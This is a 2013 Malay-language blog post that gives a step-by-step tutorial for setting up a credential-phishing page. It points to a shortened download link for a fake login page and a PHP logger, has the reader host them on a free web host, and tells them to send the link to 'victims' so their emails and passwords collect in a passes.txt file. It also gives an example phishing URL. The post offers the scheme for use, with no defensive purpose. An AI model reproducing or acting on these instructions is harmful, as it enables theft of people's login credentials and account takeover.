Wednesday 5 June 2013

1.Download File Sini >http://is.gd/CEtOCa<

2.Reqister Webhost Hanny Guna 000webhost.com
Req sini www. 000web host.com /order.php Kalau Korang Ade Domain Bole Letak Domain Name sendiri ;3

3.Buka file manager then masukkan pass webhost tersebut

4. Click/buka folder public_html.Click newfile. kali ni kita akan buat page phishing kita.Copy code di dalam file index.html.

5. Then, paste code2 tersebut ke dalam kotak besar yg ada tulis "enter your code here".pastikan anda padam terlebih dahulu perkataan ini.File name anda letak = index.html.save dan tekan back

6. Sekarang kita akan membuat file write.php pulak.tekan new file sekali lagi.kali ni copy code2 di dalam write.php dan paste di dalam kotak besar tadi.pastikan anda delete perkataan "enter your code here".
file name = phis.php .save dan tekan back.

7. Sekarang kita cuma perlu mengambil link page phishing yg telah kita buat sebentar tadi.Link ini akan digunakan untuk diberikan kepada mangsa.Tengok dekat file halakan cursor mouse anda di file index.html,dan tengok di bawah tab "action".ada "open".right click dan copy link.

8. Sekarang anda boleh memberi link itu kepada mangsa anda.apabila mangsa anda login di phishing page tersebut,sebuah file bernama passes.txt akan muncul di dalam file manager(anda perlu refresh file manager untuk tengok file itu.di dalam passes.txt tersimpan email dan password mangsa.

Contoh:http://youhasbeenphis.net23.net/index.php

greetz thank to https://www.facebook.com/alex.gov.my?hc_location=stream

0 comments:

Post a Comment